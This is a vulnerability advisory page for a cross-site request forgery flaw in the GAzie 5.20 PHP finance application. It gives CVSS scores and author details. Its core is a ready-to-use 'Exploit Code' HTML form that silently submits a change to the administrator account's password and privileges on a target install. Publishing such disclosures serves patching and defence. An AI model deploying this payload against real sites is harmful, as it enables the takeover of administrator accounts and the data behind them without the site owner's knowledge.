GAzie <= 5.20 Cross Site Request Forgery

2012-02-06 / 2012-08-15
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

======================================== GAzie <= 5.20 Cross Site Request Forgery ======================================== Author___: giudinvx Email____: <giudinvx[at]gmail[dot]com> Date_____: 5/02/2012 Site_____: http://www.giudinvx.altervista.org/ -------------------------------------------------------- @Application Info: Multicompany finance application written in PHP using a MySql database backend for small to medium enterprise. It lets you write invoices, manage stock, manage orders , accounting, etc. Send tax receipt to electronic cash register. @Version 5.20http://sourceforge.net/projects/gazie/ -------------------------------------------------------- ==============[[ -Exploit Code- ]]============== <form enctype="multipart/form-data" action="[localhost]/modules/config/admin_utente.php?Login=amministratore&Update" method="POST"> <input type="hidden" name="Login" value="amministratore"> <input type="hidden" value="" name="Update"> <input type="text" value="Surname " name="Cognome" title="Cognome"> <input type="text" value="Name " name="Nome" title="Nome"> <input type="text" value="italian" name="lang"> <input type="text" value="9" name="Abilit"><br/> Password <input type="password" value="" name="Password"><br/><!-- at least eight alphanumeric characters --> Repeat password <input type="password" value="" name="confpass"><br/> <input type="submit" value="START THE GAME" name="Submit"> </form>

References:

http://www.giudinvx.altervista.org/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top